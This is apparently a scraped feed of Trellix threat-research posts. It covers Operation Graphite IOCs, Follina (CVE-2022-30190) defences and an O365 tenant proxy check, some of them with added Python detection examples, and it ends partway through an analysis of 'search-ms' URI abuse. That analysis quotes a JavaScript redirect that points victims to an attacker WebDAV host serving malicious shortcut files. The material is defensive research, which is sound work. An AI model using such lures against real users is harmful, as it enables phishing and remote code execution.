| RSA \n \n#### Indicators of Compromise (IOCs)\n\n##### First stage \u2013 Excel Downloaders\n\n40d56f10a54bd8031191638e7df74753315e76f198192b6e3965d182136fc2fa \nf007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n9052568af4c2e9935c837c9bdcffc79183862df083b58aae167a480bd3892ad0 \n\n\n##### Second stage \u2013 Downloader DLL\n\n1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n\n\n##### Third stage \u2013 Graphite\n\n35f2a4d11264e7729eaf7a7e002de0799d0981057187793c0ba93f636126135f \nf229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n\n\n##### Fourth stage \u2013 DLL Launcher Stager\n\n25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n\n\n##### Fifth stage \u2013 PowerShell C# Stager\n\nd5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n\n\n##### Sixth stage \u2013 Empire HTTP Powershell Stager\n\nda5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n\n\n##### URLs\n\nhxxps://wordkeyvpload[.]net/keys/Missions Budget Lb.xls \nhxxps://wordkeyvpload[.]net/keys/parliament_rew.xls \nhxxps://wordkeyvpload[.]net/keys/Missions Budget.xls \nhxxps://wordkeyvpload[.]net/keys/TR_comparison.xls \n\n\nhxxps://wordkeyvpload[.]net/keys/JjnJq3.html \nhxxps://wordkeyvpload[.]net/keys/iz7hfD.html \nhxxps://wordkeyvpload[.]net/keys/Ari2Rc.html \nhxxps://wordkeyvpload[.]net/keys/OD4cNq.html \n\n\nhxxps://wordkeyvpload[.]net/keys/0YOL4.cab \nhxxps://wordkeyvpload[.]net/keys/whmel.cab \nhxxps://wordkeyvpload[.]net/keys/UdOpQ.cab \nhxxps://wordkeyvpload[.]net/keys/D9V5E.cab \n\n\nhxxps://wordkeyvpload[.]net/keys/update.dat \n\n\nhxxps://wordkeyvpload[.]org/index.jsp \nhxxps://wordkeyvpload[.]org/index.php \nhxxps://wordkeyvpload[.]org/news.php \nhxxps://wordkeyvpload[.]org/admin/get.php \nhxxps://wordkeyvpload[.]org/login/process.php \n\n\n##### Domains\n\nwordkeyvpload[.]net \nwordkeyvpload[.]org \njimbeam[.]live \n\n\n##### 
IPs\n\n131.153.96[.]114 \n185.117.88[.]19 \n94.140.112[.]178 \n\n", "cvss3": {}, "published": "2022-01-25T00:00:00", "type": "trellix", "title": "Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-25T00:00:00", "id": "TRELLIX:6949BCDE9887B6759BD81365E21DD71C", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-03T00:00:00", "description": "\n\n# Trellix Global Defenders: Follina \u2014 Microsoft Office Zero-Day (CVE-2022-30190)\n\nBy Taylor Mullins, **Robin Noyce**, **Benjamin Marandel** \u00b7 June 3, 2022\n\nTrellix is continuing to monitor the threat activity associated with the Microsoft Office zero-day vulnerability that has been dubbed \u201cFollina.\u201d Chinese-linked threat actors are actively exploiting this zero-day vulnerability to execute malicious code remotely. At the time of this writing there is no official patch from Microsoft, but steps and protections can be put in place to mitigate the attacks that use this vulnerability.\n\n[Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)\n\nThese attacks use malicious Word documents that execute PowerShell commands via the Microsoft Support Diagnostic Tool (MSDT). The \u2018Follina\u2019 zero-day provides remote code execution that works without elevated privileges, does not require macros to be enabled to execute binaries or scripts, and, at the time of writing, could bypass Windows Defender detection. 
Viewing the document in the Explorer preview pane is another way to detonate the malicious code; it triggers without the file being opened in Word, so it falls outside the Protected View that Microsoft reports will block the attack when the document is opened normally. Furthermore, msdt.exe is a Microsoft-signed binary, so its execution passes controls that trust signed Windows components. The Follina vulnerability is exploitable with Office 2013, 2016, 2019, 2021, Office ProPlus and Office 365.\n\n## Microsoft recommended workaround for microsoft support diagnostic tool (MSDT)\n\nMicrosoft has released guidance on disabling the Microsoft Support Diagnostic Tool (MSDT) URL protocol handler; until a patch is available, this removes the ms-msdt: entry point that the malicious documents rely on. The Microsoft Support Diagnostic Tool (MSDT) is a tool designed to collect information to send to Microsoft Support.\n\n[CISA: Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability>)\n\n Figure 1. Workaround provided by Microsoft to mitigate against exploitation \n\n\n## Trellix product protections for follina vulnerability\n\nTrellix is continuing to add protections via threat feeds and content updates to the Trellix products as Indicators of Compromise (IOCs) and behavioral techniques are detected in the wild. In addition, there are proactive steps that can further protect your environment against the attacks targeting the Follina zero-day vulnerability.\n\n Figure 2. MITRE ATT&CK Matrix for Exploitation of Follina Vulnerability. Source: MVISION Insights \n\n\n## Follina zero-day threat intelligence and hunting rules\n\nMVISION Insights is continually updated with the latest threat intelligence and known indicators that are being discovered related to the Microsoft zero-day vulnerability. 
Additionally, applying hunting rules and threat intelligence across the security stack is key for early detection and identification of the Tactics, Techniques, and Procedures (TTPs) associated with Follina.\n\n#### MVISION Insights Campaign Name - Follina \u2014 A Microsoft Office Code Execution Vulnerability\n\n Figure 3. YARA, Snort, and Sigma Hunting Rules specific to Follina Vulnerability Source: MVISION Insights \n Figure 4. Campaign overview and detections for Follina. Source: MVISION Insights \n Figure 5. Follina Indicators of Compromise (IOCs) and endpoint detections. Source: MVISION Insights \n Figure 6. MVISION Insights API to pull Campaign Threat Intelligence for further correlation across data events. \n\n\n## Utilizing expert and behavioral rules in trellix endpoint security\n\nTrellix ENS Threat Prevention and Adaptive Threat Protection (ATP) monitor Microsoft Word process activity; the start of a child command-line process is detected and, if so configured, blocked by ENS ATP. Trellix ENS can also block common processes such as cmd.exe from being spawned by Microsoft Office applications in a suspicious manner. 
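The parent-child relationships mentioned above (Word starting msdt.exe, the diagnostic tool going on to start a command line) applied to process-creation telemetry, as an added Python example that is neither a Trellix ENS rule nor an MVISION EDR query. Field names, process ids and events are constructed; sdiagnhost.exe, the script host that msdt.exe launches, is included from the editor's own knowledge rather than from this page.

```python
"""Flag the Follina process chain in process-creation telemetry.

Added example, not a Trellix ENS rule and not an MVISION EDR query. It encodes
the behaviour the text describes (an Office application starting msdt.exe,
the diagnostic tool going on to start cmd.exe or PowerShell) and the
ms-msdt: URL scheme the lure relies on. Field names and events are
constructed; map them to your own source (Sysmon event 1, EDR process
events). sdiagnhost.exe is the script host msdt.exe launches (not on the page).
"""
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
MSDT_CHAIN = {"msdt.exe", "sdiagnhost.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path):
    """Lower-cased file name from a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Reasons this single event is suspicious, in evaluation order (empty if none)."""
    parent, image = basename(event["parent_image"]), basename(event["image"])
    cmd = event.get("command_line", "").lower()
    reasons = []
    if parent in OFFICE_APPS and image == "msdt.exe":
        reasons.append("office_spawned_msdt")
    if "ms-msdt:" in cmd:            # also covers the preview-pane case, where the parent is explorer.exe
        reasons.append("ms-msdt_url_in_command_line")
    if parent in MSDT_CHAIN and image in SHELLS:
        reasons.append("msdt_spawned_shell")
    return reasons


def detect(events):
    """One finding per suspicious event: pid, image and the reasons."""
    findings = []
    for event in events:
        reasons = classify(event)
        if reasons:
            findings.append({"pid": event["pid"], "image": basename(event["image"]), "reasons": reasons})
    return findings


# constructed events; command lines are placeholders, not a working lure
SAMPLE_EVENTS = [
    {"pid": 4000, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" invoice.docx'},
    {"pid": 4102, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\msdt.exe",
     "command_line": r'"C:\Windows\System32\msdt.exe" ms-msdt:/id PCWDiagnostic /param PLACEHOLDER'},
    {"pid": 4120, "parent_image": r"C:\Windows\System32\msdt.exe",
     "image": r"C:\Windows\System32\sdiagnhost.exe", "command_line": "sdiagnhost.exe -Embedding"},
    {"pid": 4130, "parent_image": r"C:\Windows\System32\sdiagnhost.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"pid": 5200, "parent_image": r"C:\Windows\explorer.exe",     # user-started troubleshooter, benign
     "image": r"C:\Windows\System32\msdt.exe", "command_line": "msdt.exe /id NetworkDiagnosticsWeb"},
]
```

The benign last event shows why the historical search for `ProcessName = msdt.exe` alone needs triage: msdt.exe runs legitimately from Settings and support tooling, and it is the Office parent, the `ms-msdt:` scheme on the command line, or the shell child that turns a hit into a finding.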
The following rules in Trellix ENS Exploit Prevention and Adaptive Threat Protection (ATP) are recommended to observe or block behavioral activity associated with exploitation techniques.\n\n**Exploit Prevention Signature 6113: T1055 - Fileless Threat: Reflective Self Injection \nExploit Prevention Signature 6127: Suspicious LSASS Access from PowerShell \nExploit Prevention Signature 6143: T1003 - Attempt to Dump Password Hash from SAM Database \nExploit Prevention Signature 8004: Fileless Threat: Malicious PowerShell Behavior Detected**\n\n**ATP Rule 239: Identify suspicious command parameter execution \nATP Rule 263: Detect processes accessing suspicious URLs \nATP Rule 301: Blocks cmd.exe from being spawned by office applications \nATP Rule 332: Prevent certutil.exe from downloading or decoding files with suspect extensions**\n\nThe Trellix Advanced Threat Research (ATR) team has also created the following ENS Expert Rule to prevent techniques associated with exploitation. Outlined below are several screenshots on how to create this specific Expert Rule in Trellix ENS. Per standard practice, we recommend that customers test this rule in Report Only before moving to Block mode.\n\n[Detect new code injection method in Microsoft Office CVE-2022-30190](<https://github.com/advanced-threat-research/Expert-Rules/blob/main/Block_Office_Code_Execution.md>)\n\n[How to Use Expert Rules in ENS to Prevent Malicious Exploits](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/using-expert-rules-in-ens-10-5-3-to-prevent-malicious-exploits/>)\n\n Figure 7. Creation of the Expert Rule in the Trellix ENS Exploit Prevention Policy \n Figure 8. Creating specific Expert Rule for Microsoft Office (CVE-2022-30190) in Trellix ENS \n\n\n## Hunting for suspicious behavior with MVISION EDR\n\nMVISION EDR has the capability to search across historical and real-time data on endpoints to identify specific activity associated with exploitation and the MSDT process. 
Several examples and queries are noted below for using Historical and Real-time searches to analyze the Microsoft Support Diagnostic Tool (MSDT) process activity and its interaction with CMD and PowerShell.\n\n**Processes and HostInfo hostname where Processes name equals msdt.exe** \u2013 Real-time search query to locate activity specific to the Microsoft Support Diagnostic Tool (MSDT) process\n\n**ProcessName = msdt.exe** \u2013 Historical search string to locate prior activity from MSDT.exe across your endpoints, even those that are currently offline.\n\n Figure 9. MVISION EDR Real-time search to locate ongoing MSDT.exe activity \n Figure 10. MVISION EDR Historical Search query across all endpoints either online or offline to locate prior MSDT.exe process activity \n\n\n## Trellix network security platform signature release\n\nTrellix has released a User-Defined Signature (UDS) for the Network Security Platform (NSP) to provide an immediate solution to this security advisory. Trellix writes and tests these signatures with the objective of a quick turnaround.\n\n[Knowledge Center - REGISTERED - NSP Emergency UDS Release Notes - UDS-HTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190) (mcafee.com)](<https://kcm.trellix.com/agent/index?page=content&id=KB95702>)\n\n## Additional resources\n\n[Microsoft: Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) \n[Huntress: Rapid Response: Microsoft Office RCE - \u201cFollina\u201d MSDT Attack](<https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug>) \n[Bleeping Computer: Windows MSDT zero-day now exploited by Chinese APT hackers](<https://www.bleepingcomputer.com/news/security/windows-msdt-zero-day-now-exploited-by-chinese-apt-hackers/>)\n", "cvss3": {}, "published": "2022-06-03T00:00:00", "type": "trellix", "title": "Trellix 
Global Defenders: Follina \u2014 Microsoft Office Zero-Day (CVE-2022-30190)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-03T00:00:00", "id": "TRELLIX:1B98406D173663FA7B8E48F103AAE482", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/follina-microsoft-office-zero-day-cve-2022-30190.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-20T00:00:00", "description": "\n\n# Trellix Global Defenders: Defending against Cyber Espionage Campaigns \u2013 Operation Graphite\n\nBy Ben Marandel, **Arnab Roy** \u00b7 June 20, 2022\n\nCyber espionage campaigns are by nature targeted attacks that can go undetected for prolonged periods of time. They often involve adversaries with clear objectives and the capability to avoid defenses and leverage trusted enterprise IT systems or operational weaknesses within organisations. Some of the key targets for espionage campaigns are as follows:\n\n Figure 1: Cyber Espionage Key Targets \n\n\nThe ultimate goal of most cyber espionage campaigns is data exfiltration and widespread reconnaissance.\n\n## Operation graphite introduction \n\nThe Trellix Advanced Threat Research team released threat research on the 25th of January 2022 highlighting the discovery of a new espionage campaign targeting high-ranking government officials in Western Asia and Eastern Europe. The attack is believed to have been triggered via targeted phishing with a malicious Excel document used to establish initial access. Once opened, the malicious document leveraged the MSHTML vulnerability CVE-2021-40444, which is reachable from Office documents and allows remote code execution on the impacted endpoint. As in other espionage campaigns, there was hands-on reconnaissance of the targeted organization, specifically looking for documents containing keywords of interest. 
This was followed by a multi-stage attack that included lateral movement to other systems of interest such as domain controllers and file servers. The following figure shows the attack progression:\n\n Figure 2: Attack Chain \n\n\nLike most multi-stage attacks, it combines several techniques: use of LOLBAS/LOLBins such as PowerShell, and exploitation of enterprise architecture and system vulnerabilities.\n\nDuring our analysis of the overall flow of the attack and the related payloads, the following attributes stood out as critical for detecting or preventing this threat:\n\n 1. Use of OneDrive as a command and control server as well as for storing payload configuration and staging. There is evidence that the OneDrive implant module of the Empire framework was used by the threat actor, which has been documented by the [empire framework maintainers](<https://www.bc-security.org/post/using-the-onedrive-listener-in-empire-3-1-3/>). This was used specifically to subvert network security controls and hide traffic inside a legitimate application. \n 2. Use of an XLS embedded in an XLSX to bypass the macro execution protection added to Excel. The XLS is the secondary payload that exploits CVE-2021-40444; it is not the first file the victim opens. To maximize the chance that the exploitable XLS is executed, the attacker uses dynamic loading of the Office ribbon and custom options in the Office toolbar through an XLSM file, and this XLSM file then dynamically loads the XLS that triggers CVE-2021-40444.\n\nBased on the observed TTPs and operational similarity, the Trellix Threat Research team was moderately confident that this attack could be attributed to APT28.\n\n## Defensive architecture guidance\n\nThe question is how do we protect ourselves from such attacks? 
At the heart of the answer is building an effective threat model for cyber espionage campaigns and then driving your defensive strategy from a \u201cthink red, act blue\u201d mindset, where a threat-informed, layered defensive strategy drives how the security controls are configured to provide a resilient defensive architecture. Below is how the Trellix XDR solution architecture protects against and detects this attack.\n\n Figure 3: Trellix Solution Architecture \n\n\nOrganizations can build an effective threat model from adversary characteristics, many of which are well documented in the MITRE ATT&CK framework. Tools such as the MITRE ATT&CK Navigator let you combine the TTPs of multiple threat actors into a threat model for your SOC; below is an example for the TTPs used by APT28:\n\n**Common techniques used for Cyber Espionage - using ATT&CK**\n\n Figure 4: MITRE ATT&CK Navigator for APT28 \n\n\nHowever, for customers who have Trellix Insights this process is even simpler: by filtering the Profiles to APT28, you get a complete overview of the APT28 group\u2019s activities. As an introduction, the tool gives you a short description of the group and the countries and sectors it currently targets. \n\n Figure 5: APT28 Group Overview from MVISION Insights \n\n\nJust after this introduction, you get an overview of the 42+ campaigns currently observed by Trellix Labs. This view also indicates which endpoints within your organization may have insufficient coverage to protect themselves. By clicking on the name of a campaign, you pivot to the full details of the selected campaign.\n\n Figure 6: Examples of APT28 related campaigns from MVISION Insights \n\n\nThe third section of the interface describes the MITRE techniques and tools used by the APT28 group. 
Once C2 communication is established, researchers observed the use of the \u201cFile and Directory Discovery \u2013 T1083\u201d technique for Discovery and the \u201cData Transfer Size Limits \u2013 T1030\u201d technique for Exfiltration.\n\nThis group also uses tools such as Mimikatz to simplify Credential Access via LSASS Memory \u2013 T1003.001, Certutil to download third-party tools, and X-Tunnel for Exfiltration Over Asymmetric Encrypted Non-C2 Protocol \u2013 T1048.002. \n\n Figure 7: MITRE Techniques used by the APT28 Group from MVISION Insights \n\n\nFinally, based on all this information, the interface builds the ATT&CK matrix for you, with a clear representation of the observed techniques.\n\n Figure 8: APT28 Group MITRE ATT&CK matrix from MVISION Insights \n\n\n**Endpoint Protection Actions:** Trellix Endpoint uses exploit prevention to block exploitation of CVE-2021-40444 as well as behavioral threat protection via the Adaptive Threat Protection module. Specifically, Advanced Behavior Blocking (ABB) rules stop Office processes from launching child processes, breaking the kill chain early in the attack lifecycle. 
The following rules in Trellix ENS Exploit Prevention and Adaptive Threat Protection (ATP) are recommended to observe or block behavioral activity associated with exploitation techniques.\n\n**ENS Exploit Prevention Signature 6163:** T1055: Suspicious Behavior: Malicious Shell Injection Detected\n\n**ENS Exploit Prevention Signature 6115:** T1055: Fileless Threat: Reflective DLL Remote Injection\n\n**ENS ATP Rule 300:** T1566: Prevent office applications from launching child processes that can execute script commands \n\nTo complement these protection capabilities, the Trellix EDR solution detects and visualizes the attack chain, as illustrated below at \u201cInitial Access\u201d, when the victim opens the specially crafted XLSX file for the first time.\n\nIn this screenshot of a demo sample, you can observe Excel downloading the XLS file over an HTTPS connection after it has opened the XLSX file.\n\n Figure 9: Excel.exe opening an XLSX file and then downloading an XLS file, captured by MVISION EDR \n\n\n**Preventing Data Exfiltration:** Preventing the attempts to exfiltrate data can defeat this type of attack at an early stage. The threat actor uses two key techniques for data exfiltration: exfiltration over existing network protocols and endpoint data reconnaissance. The exfiltration over an existing network protocol leverages the Microsoft Graph API, which the O365 suite of apps uses to communicate between the various O365 services. The Graph API has been a target of previous APT campaigns as it provides unique insight into enterprise data sitting inside O365. One of the key ways to cut this attack\u2019s command and control is to ensure users cannot log in to non-sanctioned O365 tenants. This is possible with a URL content proxy that inspects the O365 tenant id in the login URL and in the subsequent communication. 
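A tenant allow-list decision of the kind the proxy above would make, as an added Python example (not Trellix's product logic). It checks the tenant segment of Azure AD login URLs and, for the subsequent Graph API calls, the `tid` claim of the bearer token; tenant ids, tokens and requests are constructed, and the JWT is decoded without signature verification because the proxy only needs the claim to route its decision, not to trust the token.

```python
"""Tenant allow-list check for an inspecting proxy (added example, not product logic).

Two places the tenant shows up: the tenant segment of Azure AD login URLs
(https://login.microsoftonline.com/<tenant>/...) and the tid claim of the
bearer token on Graph API calls. Tenant ids, tokens and requests below are
constructed; the JWT is not signature-checked.
"""
import base64
import json
from urllib.parse import urlsplit

LOGIN_HOSTS = {"login.microsoftonline.com", "login.microsoft.com", "login.windows.net"}
GRAPH_HOSTS = {"graph.microsoft.com"}
ORG_TENANT = "11111111-2222-3333-4444-555555555555"        # constructed organisational tenant id
ATTACKER_TENANT = "99999999-8888-7777-6666-555555555555"   # constructed attacker-controlled tenant id
MULTI_TENANT = {"common", "organizations", "consumers"}


def tenant_from_login_url(url):
    """First path segment of an AAD login URL, or None if not a login host."""
    u = urlsplit(url)
    if u.hostname not in LOGIN_HOSTS:
        return None
    return u.path.strip("/").split("/", 1)[0].lower() or None


def tid_from_bearer(authorization):
    """Decode the tid claim from an 'Authorization: Bearer <jwt>' value (no verification)."""
    if not authorization or not authorization.lower().startswith("bearer "):
        return None
    parts = authorization.split(" ", 1)[1].split(".")
    if len(parts) != 3:
        return None
    payload = parts[1] + "=" * (-len(parts[1]) % 4)
    try:
        claims = json.loads(base64.urlsafe_b64decode(payload))
    except (ValueError, UnicodeDecodeError):
        return None
    tid = claims.get("tid")
    return tid.lower() if isinstance(tid, str) else None


def decide(request, allowed=frozenset({ORG_TENANT})):
    """Return (allow, reason) for one proxied HTTPS request."""
    allowed = {a.lower() for a in allowed}
    url = request["url"]
    host = urlsplit(url).hostname
    if host in LOGIN_HOSTS:
        tenant = tenant_from_login_url(url)
        if tenant in allowed:
            return True, "login to sanctioned tenant"
        if tenant in MULTI_TENANT:
            # no tenant in the URL; the proxy must fall back to Microsoft's
            # Tenant Restrictions headers so Azure AD enforces the list
            return True, "multi-tenant endpoint, enforce via tenant-restriction headers"
        return False, f"login to unsanctioned tenant {tenant}"
    if host in GRAPH_HOSTS:
        tid = tid_from_bearer(request.get("headers", {}).get("Authorization"))
        if tid in allowed:
            return True, "graph call with sanctioned tenant token"
        return False, f"graph call with token for tenant {tid}"
    return True, "not an identity or Graph host"


def make_unsigned_jwt(claims):
    """Build an unsigned JWT for the constructed samples (Graph itself would reject it)."""
    def enc(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return f"{enc({'alg': 'none', 'typ': 'JWT'})}.{enc(claims)}."


# constructed requests: sanctioned login, attacker-tenant login, Graph calls with each token
SAMPLE_REQUESTS = [
    {"url": f"https://login.microsoftonline.com/{ORG_TENANT}/oauth2/v2.0/token"},
    {"url": f"https://login.microsoftonline.com/{ATTACKER_TENANT}/oauth2/v2.0/token"},
    {"url": "https://graph.microsoft.com/v1.0/me/drive/root:/check:/children",
     "headers": {"Authorization": "Bearer " + make_unsigned_jwt({"tid": ATTACKER_TENANT})}},
    {"url": "https://graph.microsoft.com/v1.0/me/drive/root/children",
     "headers": {"Authorization": "Bearer " + make_unsigned_jwt({"tid": ORG_TENANT})}},
]
```

The `common` and `organizations` login endpoints do not name a tenant in the URL, so a path check alone cannot block them; that is the case Microsoft's Tenant Restrictions feature covers, where the proxy adds the `Restrict-Access-To-Tenants` and `Restrict-Access-Context` headers on requests to the login hosts and Azure AD enforces the allow list. The Graph-side `tid` check still catches a token obtained elsewhere, which is how a hardcoded token such as Graphite's would be used.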
The proxy can be configured to allow only the organizational tenant id of the enterprise O365 instance and not that of other O365 tenants. This prevents the threat actor from establishing the initial command and control connection and from exfiltrating data through it. Deploying endpoint DLP is the second critical factor in preventing sensitive information from leaving the organizational perimeter; this includes visibility into the endpoint processes that access sensitive or tagged data.\n\n**Bringing Visibility into the SOC with XDR:** Detecting multi-vector telemetry requires context and correlation across multiple data sources so that the right alerts and telemetry are presented to the SOC analyst for effective triage, scoping of the threat and incident response.\n\n Figure 10: Example XDR Correlation with multi-vector sensor telemetry from Threat Intelligence, Endpoint, DLP \n\n\n**Integrated sandbox for malware analysis:** As part of the Trellix solution architecture, the endpoints can send files dynamically, or through integrated SOAR workflows, to the Trellix Detection on Demand cloud sandbox. A quick analysis of the XLSX document reveals that pseudo data was used to entice the end user into opening the document.\n\n Figure 11: Trellix DOD Analysis \n\n\n## Summary\n\nDefeating a multi-stage cyber espionage campaign requires a multipronged defensive strategy: build an effective threat model, use it to prioritize and deploy the highest-impact preventive controls, and arrive at a security model that stalls the attacker\u2019s progress and delivers enterprise resilience to cyber espionage campaigns. 
Some of the key steps in building such resilience are as follows:\n\n Figure 12: Cyber Espionage Playbook \n\n\nFor additional details and understanding, you can view our Threat Center webinar with Trellix Solution Architects explaining how we defend against this attack [here](<https://www.mcafee.com/enterprise/en-us/forms/gated-form.html?docID=video-6305609522112&eid=P5SWSAQK>).\n", "cvss3": {}, "published": "2022-06-20T00:00:00", "type": "trellix", "title": "Trellix Global Defenders: Defending against Cyber Espionage Campaigns \u2013 Operation Graphite", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-06-20T00:00:00", "id": "TRELLIX:0BACBA94111E0C364A9A1CCD8BD263DE", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/defending-against-cyber-espionage-campaigns-operation-graphite.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-26T00:00:00", "description": "# Beyond File Search: A Novel Method for Exploiting the \"search-ms\" URI Protocol Handler\n\nBy [Mathanraj Thangaraju](<https://www.trellix.com/en-in/about/newsroom/stories/contributors/mathanraj-tk.html>) and [Sijo Jacob](<https://www.trellix.com/en-in/about/newsroom/stories/contributors/sijo-jacob.html>) \u00b7 July 26, 2023\n\n## Threat Summary\n\nIn the ever-evolving landscape of cyber threats, malware authors continuously explore new avenues to exploit unsuspecting users. The Windows operating system provides a powerful search feature that allows users to quickly find files, folders, and other items on their computers. One of the lesser-known aspects of this search feature is the \"[search-ms](<https://learn.microsoft.com/en-us/windows/win32/search/getting-started-with-parameter-value-arguments>)\" URI protocol handler, which offers enhanced search capabilities for performing local searches. 
It also offers the capability to perform queries on file shares located on remote hosts, and this can be exploited, as explained in our Trellix Research [blog](<https://www.trellix.com/en-in/about/newsroom/stories/research/countering-follina-attack-with-network-security-platforms-advanced-detection-features.html>).\n\nIn an exciting discovery, Trellix Advanced Research Center has uncovered a novel attack technique leveraging the \u201csearch-ms\u201d URI protocol handler. While we were already aware of attackers exploiting the \u201csearch-ms\u201d URI protocol handler through malicious documents, our investigation has revealed an advancement in their approach. We have discovered that attackers are directing users to websites that exploit the \u201csearch-ms\u201d functionality using JavaScript hosted on the page. This technique has even been extended to HTML attachments, expanding the attack surface. In our research, we have explored not only the capabilities of the \"search-ms\" protocol but also the \u201c[search](<https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/cc144083\\(v=vs.85\\)#syntax>)\u201d protocol. The \u201csearch\u201d application protocol was introduced in Windows Vista with SP1 and is present in later versions. The operating system uses the search protocol to launch the default desktop search application. Leveraging both protocols, we successfully invoked the search functionality from various script files, including Batch, Visual Basic, PHP, and PowerShell. This demonstrates the versatility and effectiveness of this attack technique, which harnesses the features of both search protocols to carry out malicious activities.\n\nDuring an attack leveraging the \u201csearch\u201d / \u201csearch-ms\u201d URI protocol handler, threat actors may create deceptive emails containing hyperlinks or email attachments that redirect users to compromised websites. 
When users visit the website, malicious JavaScript initiates searches on a remote server using the \u201csearch\u201d / \"search-ms\" URI protocol handler. The search results, remotely hosted malicious shortcut files, are displayed in Windows Explorer disguised with PDF or other trusted icons, just like local search results. This technique conceals the fact that the user is being served remote files and gives the user the illusion of trust. As a result, the user is more likely to open the file, assuming it is from their own system, and unknowingly execute malicious code.\n\nIn this blog, we aim to provide a comprehensive understanding of how threat actors leverage the \u201csearch-ms\u201d URI protocol handler as a vehicle for their malicious activities and the steps involved from initial delivery to payload execution.\n\n## Infection Chain\n\n Figure 1: Execution flow of the attack \n\n\n## Real-World Phishing Examples\n\nTrellix Advanced Research Center has observed phishing emails making use of the \"search-ms\" URI protocol handler to download a malicious payload. These phishing emails try to trick the recipient into clicking on a malicious link by pretending to be an urgent request for quotation from a sales manager. \n\n Figure 2: Sample phishing emails \n\n\nIn our research, we encountered other attack variants, such as emails with HTML or PDF attachments. These attachments contained URLs leading to a compromised website hosting scripts that incorporated the \u201csearch-ms\u201d URI protocol handler. In addition, HTML files can also initiate the attack by embedding scripts that trigger the \u201csearch-ms\u201d URI protocol handler directly.\n\n Figure 3: PDF files with URL containing the \u201csearch-ms\u201d URI protocol handler \n\n\nUpon clicking the link in the email or attachment, the recipient is redirected to the website abusing the \u201csearch-ms\u201d URI protocol handler. 
Below we see the GET request for page.html from Figure 2, highlighting the suspicious script:\n\n Figure 4: HTML with \u201csearch-ms\u201d URI Protocol Handler \n\n### Invisible Threats: Demystifying the Dark Side of \u201cSearch-MS\u201d URI Protocol Handler\n\nThe code snippet highlighted in the figure above invokes the \u201csearch-ms\u201d URI protocol handler to perform a search operation on an attacker-controlled server. Let us break down the code and understand its components:\n\n * <script></script>: The code is encapsulated within <script> tags, which denote JavaScript code within an HTML document.\n * window.location.href: This JavaScript property holds the current URL or location of the web page. Assigning to it redirects the user to a different location. \n * 'search-ms:query=Review&crumb=location:\\\\\\dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSL\\DavWWWRoot&displayname=Search': This is the value assigned to the window.location.href property. It is the target URL to which the user is redirected. \n * search-ms: This is the protocol identifier that signifies the use of the Windows Search protocol.\n * query=Review: The \"query\" parameter specifies the search criteria, in this case \"Review\". The search operation will look for items related to the term \"Review\".\n * crumb=location:\\\\\\dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSL\\DavWWWRoot: The \"crumb\" parameter defines the location or path constraint for the search. The value \"location:\\\\\\dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSL\\DavWWWRoot\" specifies the folder path where the search should be performed, here a remote WebDAV share rather than a local folder. 
